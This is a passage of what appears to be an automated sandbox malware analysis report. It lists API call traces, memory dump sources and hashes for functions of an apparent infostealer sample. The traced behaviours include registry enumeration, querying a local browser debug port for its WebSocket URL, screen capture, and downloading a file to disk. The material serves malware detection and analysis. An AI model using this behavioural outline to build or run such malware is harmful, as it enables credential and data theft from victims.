                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID:
                              • API String ID: 2500673778-0
                              • Opcode ID: e064fe6938770e434da60fb0de6bde7647be707e3c5d3d9a10b6211d65370111
                              • Instruction ID: a1705d176a3d4634c2c334326bb6c95ab645581bb409427e443ca518d306efa7
                              • Opcode Fuzzy Hash: e064fe6938770e434da60fb0de6bde7647be707e3c5d3d9a10b6211d65370111
                              • Instruction Fuzzy Hash: 56023D31A01606DFCF26DF65EA89B6AF7F5AF54304F1A806DE4099B261DB31DC46CB80
                              APIs
                                • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                              • RegOpenKeyExA.ADVAPI32(?,00F2BF20,00000000,00020019,?), ref: 003B37BD
                              • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 003B37F7
                              • wsprintfA.USER32 ref: 003B3822
                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 003B3840
                              • RegCloseKey.ADVAPI32(?), ref: 003B384E
                              • RegCloseKey.ADVAPI32(?), ref: 003B3858
                              • RegQueryValueExA.ADVAPI32(?,00F2F2C8,00000000,000F003F,?,?), ref: 003B38A1
                              • lstrlen.KERNEL32(?), ref: 003B38B6
                              • RegQueryValueExA.ADVAPI32(?,00F2F298,00000000,000F003F,?,00000400), ref: 003B3927
                              • RegCloseKey.ADVAPI32(?), ref: 003B3972
                              • RegCloseKey.ADVAPI32(?), ref: 003B3989
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 13140697-3278919252
                              • Opcode ID: 77ff527ca365cbead0f21d46a64287350f3ea25de6fc34a5e71272293c79b25e
                              • Instruction ID: e0e2fc74a45a3f3dc35e87259cd0d9bfaf6e11fd2eb8cae3db18af52b2dd5e37
                              • Opcode Fuzzy Hash: 77ff527ca365cbead0f21d46a64287350f3ea25de6fc34a5e71272293c79b25e
                              • Instruction Fuzzy Hash: 7491BD729002189FCB11DFA4CC85EEEB7B9FF88314F158569E609AB611DB31AE45CF90
                              APIs
                              • InternetOpenA.WININET(003BCFEC,00000001,00000000,00000000,00000000), ref: 003990DF
                              • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003990FC
                              • InternetCloseHandle.WININET(00000000), ref: 00399109
                              • InternetReadFile.WININET(?,?,?,00000000), ref: 00399166
                              • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00399197
                              • InternetCloseHandle.WININET(00000000), ref: 003991A2
                              • InternetCloseHandle.WININET(00000000), ref: 003991A9
                              • strlen.MSVCRT ref: 003991BA
                              • strlen.MSVCRT ref: 003991ED
                              • strlen.MSVCRT ref: 0039922E
                              • strlen.MSVCRT ref: 0039924C
                                • Part of subcall function 00398980: std::_Xinvalid_argument.LIBCPMT ref: 00398996
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                              • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                              • API String ID: 1530259920-2144369209
                              • Opcode ID: e7c126f6a12734e68ce3f4c0d34f1ac6b8c5b0e2fa096a52742c6b2af67fb166
                              • Instruction ID: 2e9da2004521bb6d3203d8c1a5719e4f75316259c38f9ff0d32c908943cfec2b
                              • Opcode Fuzzy Hash: e7c126f6a12734e68ce3f4c0d34f1ac6b8c5b0e2fa096a52742c6b2af67fb166
                              • Instruction Fuzzy Hash: 1451E571610209ABDB21DFA8DC45FEEF7F9EB44710F140469F545E7280DBB49E4887A1
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 003B16A1
                              • lstrcpy.KERNEL32(00000000,00F1A450), ref: 003B16CC
                              • lstrlen.KERNEL32(?), ref: 003B16D9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B16F6
                              • lstrcat.KERNEL32(00000000,?), ref: 003B1704
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B172A
                              • lstrlen.KERNEL32(00F2ED90), ref: 003B173F
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B1762
                              • lstrcat.KERNEL32(00000000,00F2ED90), ref: 003B176A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1792
                              • ShellExecuteEx.SHELL32(?), ref: 003B17CD
                              • ExitProcess.KERNEL32 ref: 003B1803
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                              • String ID: <
                              • API String ID: 3579039295-4251816714
                              • Opcode ID: 7c3c69ffa7a44a8a471912c84cb4bafcb40ab63054a3b77d618b4bdc1947bbc0
                              • Instruction ID: 49026b5af6de7848f447f60593de6a1cd97d4a936e74a44478f7aee095ad4053
                              • Opcode Fuzzy Hash: 7c3c69ffa7a44a8a471912c84cb4bafcb40ab63054a3b77d618b4bdc1947bbc0
                              • Instruction Fuzzy Hash: A651A171A01A1AAFCB12DFA4CC99ADEB7F9AF54300F454125E605E7251DF30AE05CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AEFE4
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AF012
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003AF026
                              • lstrlen.KERNEL32(00000000), ref: 003AF035
                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 003AF053
                              • StrStrA.SHLWAPI(00000000,?), ref: 003AF081
                              • lstrlen.KERNEL32(?), ref: 003AF094
                              • lstrlen.KERNEL32(00000000), ref: 003AF0B2
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 003AF0FF
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 003AF13F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$AllocLocal
                              • String ID: ERROR
                              • API String ID: 1803462166-2861137601
                              • Opcode ID: ee5b8604cd59b7c91161beb9847676a871656cd5fa3b0780f7ea335d06301ecc
                              • Instruction ID: 8d9a2fc1dd86a513172436172ea29d5ebd9c77c5b2dac971591f82754069d27d
                              • Opcode Fuzzy Hash: ee5b8604cd59b7c91161beb9847676a871656cd5fa3b0780f7ea335d06301ecc
                              • Instruction Fuzzy Hash: 05515C36911905AFCB23EBB8D859EAF77A4EF56700F064568E846DB212DF30DC058B94
                              APIs
                              • GetEnvironmentVariableA.KERNEL32(00F28C48,005C9BD8,0000FFFF), ref: 0039A026
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039A053
                              • lstrlen.KERNEL32(005C9BD8), ref: 0039A060
                              • lstrcpy.KERNEL32(00000000,005C9BD8), ref: 0039A08A
                              • lstrlen.KERNEL32(003C4C4C), ref: 0039A095
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039A0B2
                              • lstrcat.KERNEL32(00000000,003C4C4C), ref: 0039A0BE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039A0E4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039A0EF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039A114
                              • SetEnvironmentVariableA.KERNEL32(00F28C48,00000000), ref: 0039A12F
                              • LoadLibraryA.KERNEL32(00F15568), ref: 0039A143
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                              • String ID:
                              • API String ID: 2929475105-0
                              • Opcode ID: 635608c8e6261c3f8a8e39ee50f378a9e6715c8a96d19e6808f882bd7901ab76
                              • Instruction ID: e1b4d25fe0fa29057e83d4dab9e5cb584e02e8b9ba38b5f6ed90fbb977a4a863
                              • Opcode Fuzzy Hash: 635608c8e6261c3f8a8e39ee50f378a9e6715c8a96d19e6808f882bd7901ab76
                              • Instruction Fuzzy Hash: 6F91B131A00E109FDF329FA4DC89E7737A5ABA4704F464658E9058B2A1EFB5DC44DBC2
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AC8A2
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AC8D1
                              • lstrlen.KERNEL32(00000000), ref: 003AC8FC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AC932
                              • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003AC943
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 9a25abfe45a0945601e4eefd249c24bc407751cbbdf7ab439662fa0c8a58d27f
                              • Instruction ID: a15ab3b5628a72714958f8384eb30de7489e33579a525c5c8a248d611bbaec30
                              • Opcode Fuzzy Hash: 9a25abfe45a0945601e4eefd249c24bc407751cbbdf7ab439662fa0c8a58d27f
                              • Instruction Fuzzy Hash: AC61B371D2161AAFDB12EFB5C849ABF7BB8FF16340F055569E841EB201DB348D058B90
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,003B0CF0), ref: 003B4276
                              • GetDesktopWindow.USER32 ref: 003B4280
                              • GetWindowRect.USER32(00000000,?), ref: 003B428D
                              • SelectObject.GDI32(00000000,00000000), ref: 003B42BF
                              • GetHGlobalFromStream.COMBASE(003B0CF0,?), ref: 003B4336
                              • GlobalLock.KERNEL32(?), ref: 003B4340
                              • GlobalSize.KERNEL32(?), ref: 003B434D
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                              • String ID:
                              • API String ID: 1264946473-0
                              • Opcode ID: 433e9a4bf85689ea499530dbd9bc9d0136ce5d86df687ba0ccf0b09cf5ce9ff0
                              • Instruction ID: 87af2654e19513004238557e6de02c5a5e650228402e0954dbb78c8a01a3eddc
                              • Opcode Fuzzy Hash: 433e9a4bf85689ea499530dbd9bc9d0136ce5d86df687ba0ccf0b09cf5ce9ff0
                              • Instruction Fuzzy Hash: 03513A75A10609AFDB11EFA4DC89EEEB7B9EF58300F104419FA05E7250DB34AE05DBA0
                              APIs
                              • lstrcat.KERNEL32(?,00F2F670), ref: 003AE00D
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AE037
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE06F
                              • lstrcat.KERNEL32(?,00000000), ref: 003AE07D
                              • lstrcat.KERNEL32(?,?), ref: 003AE098
                              • lstrcat.KERNEL32(?,?), ref: 003AE0AC
                              • lstrcat.KERNEL32(?,00F1A748), ref: 003AE0C0
                              • lstrcat.KERNEL32(?,?), ref: 003AE0D4
                              • lstrcat.KERNEL32(?,00F2E118), ref: 003AE0E7
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE11F
                              • GetFileAttributesA.KERNEL32(00000000), ref: 003AE126
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 4230089145-0
                              • Opcode ID: 1f09fa19649bf261f3981e7b4f4494db58eed64805e8e90fb7437d35e4a9732a
                              • Instruction ID: 5fc75f30da0b2f9bc502be2674a2256875f3bb9c999f32d62e70cd4e951f9bdc
                              • Opcode Fuzzy Hash: 1f09fa19649bf261f3981e7b4f4494db58eed64805e8e90fb7437d35e4a9732a
                              • Instruction Fuzzy Hash: 8D618E7191151CAFCB56DB64CC48ADEB7B8FF58300F1049A5A60AA7250DF70AF899F90
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00396AFF
                              • InternetOpenA.WININET(003BCFEC,00000001,00000000,00000000,00000000), ref: 00396B2C
                              • StrCmpCA.SHLWAPI(?,00F2F930), ref: 00396B4A
                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00396B6A
                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00396B88
                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00396BA1
                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00396BC6
                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00396BF0
                              • CloseHandle.KERNEL32(00000000), ref: 00396C10
                              • InternetCloseHandle.WININET(00000000), ref: 00396C17
                              • InternetCloseHandle.WININET(?), ref: 00396C21
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
